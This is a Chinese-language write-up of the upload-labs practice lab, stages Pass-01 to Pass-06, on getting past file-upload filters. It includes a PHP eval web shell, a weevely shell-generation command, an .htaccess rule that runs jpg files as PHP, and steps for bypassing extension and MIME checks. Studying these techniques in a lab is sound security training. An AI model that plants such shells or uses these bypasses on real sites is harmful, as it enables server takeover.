搭建

https://github.com/c0ny1/upload-labs

Pass-01(前端绕过)

准备php一句话木马

1
2
3
4
<?php 
phpinfo();
eval($_POST['a']);
?>

传一句话木马时提示

image-20210508174925579

重命名后缀为png

image-20210508175133543

在burp中修改为php

image-20210508175124122

image-20210508180018350

连接菜刀

image-20210508180216841

用weevely 生成webshell

┌──(root💀B)-[~]
└─# weevely generate shell /root/1.php
Generated '/root/1.php' with password 'shell' of 774 byte size.

image-20211227150628587

Pass-02(MIME绕过)

清空上传文件

image-20211228152615218

修改Content-Type 为image/jpeg

image-20211228152747532

image-20211227150628587

也可以如同01中操作上传成功

Pass-03(apache解析漏洞)

上传文件发现报错

提示:不允许上传.asp,.aspx,.php,.jsp后缀文件!

那么尝试修改后缀

如php3

image-20210508182044319

发现php3 不解析

那么尝试phtml

也不解析

查了下 好像要修改配置orz

修改 /etc/mime.types中

在这里插入图片描述

1
service apache2 reload

解析成功了

image-20210508184452310

update-2021-12-28 15:54:41

不需要修改配置 image-20211228155547762

Pass-04(Apache配置文件.htaccess)

重写解析

1
2
3
<FilesMatch "jpg"
SetHandler application/x-httpd-php
</FilesMatch>

image-20211230155353215

image-20211230155913674

Pass-05(大小写绕过)

分析源码

1
2

$deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess");

发现没有过滤大小写

尝试大写phP

image-20211230160404192

image-20211230160451045

image-20211230160540374

Pass-06(空格绕过)

源码过滤了大小写

1
2
3
4
5
6
$deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess");
$file_name = $_FILES['upload_file']['name'];
$file_name = deldot($file_name);//删除文件名末尾的点
$file_ext = strrchr($file_name, '.');
$file_ext = strtolower($file_ext); //转换为小写
$file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA